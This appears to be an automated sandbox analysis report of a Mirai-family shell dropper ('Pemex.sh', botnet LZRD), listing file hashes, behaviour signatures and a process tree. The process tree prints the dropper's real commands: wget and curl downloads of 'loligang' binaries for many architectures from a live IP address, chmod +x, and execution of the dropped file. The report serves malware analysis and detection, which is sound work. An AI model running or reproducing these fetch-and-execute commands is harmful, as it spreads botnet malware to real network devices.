Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    23-12-2024 06:19

General

  • Target

    Pemex.sh

  • Size

    1KB

  • MD5

    e18ba04d72384ac85e6117c774f6d4f9

  • SHA1

    6cb8e9a2da2db042da0875a08f43cc867b8a2c5b

  • SHA256

    289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e

  • SHA512

    3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (73374) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 8 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 8 IoCs
  • Modifies Watchdog functionality 1 TTPs 14 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 7 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads system network configuration 1 TTPs 7 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 17 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Pemex.sh
    /tmp/Pemex.sh
    1⤵
    • Writes file to tmp directory
    PID:705
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:732
    • /bin/cat
      cat loligang.x86
      2⤵
        PID:734
      • /bin/chmod
        chmod +x awoo loligang.x86 Pemex.sh systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-LGu9q4
        2⤵
        • File and Directory Permissions Modification
        PID:735
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        PID:736
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:738
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:752
      • /bin/cat
        cat loligang.mips
        2⤵
        • System Network Configuration Discovery
        PID:777
      • /bin/chmod
        chmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-LGu9q4
        2⤵
        • File and Directory Permissions Modification
        PID:779
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:780
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:787
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:801
      • /bin/chmod
        chmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh
        2⤵
        • File and Directory Permissions Modification
        PID:805
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:806
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.arm4
        2⤵
          PID:813
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
          2⤵
          • Writes file to tmp directory
          PID:814
        • /bin/chmod
          chmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
          2⤵
          • File and Directory Permissions Modification
          PID:816
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:817
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm5
          2⤵
          • Writes file to tmp directory
          PID:824
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
          2⤵
          • Writes file to tmp directory
          PID:825
        • /bin/chmod
          chmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
          2⤵
          • File and Directory Permissions Modification
          PID:827
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:828
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm6
          2⤵
          • Writes file to tmp directory
          PID:835
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:836
        • /bin/chmod
          chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
          2⤵
          • File and Directory Permissions Modification
          PID:848
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:849
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm7
          2⤵
          • Writes file to tmp directory
          PID:854
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
          2⤵
          • Writes file to tmp directory
          PID:863
        • /bin/chmod
          chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
          2⤵
          • File and Directory Permissions Modification
          PID:873
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:874
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.ppc
          2⤵
          • Writes file to tmp directory
          PID:878
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
          2⤵
          • Writes file to tmp directory
          PID:888
        • /bin/chmod
          chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
          2⤵
          • File and Directory Permissions Modification
          PID:890
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:891
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.m68k
          2⤵
          • Writes file to tmp directory
          PID:895
        • /usr/bin/curl
          curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
          2⤵
          • Reads runtime system information
          PID:899

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/awoo

        Filesize

        87KB

        MD5

        5f6d2539a443501c888fc90986479ee6

        SHA1

        1f1ce02f9cafc0e684559cd7e36170d6cba370dc

        SHA256

        5775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137

        SHA512

        3bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198

      • /tmp/loligang.x86

        Filesize

        64KB

        MD5

        2354f2531c0bf296738fa7733c42785f

        SHA1

        86508e4ee74c70bf226f6666bf227a12be69dcad

        SHA256

        3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93

        SHA512

        eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679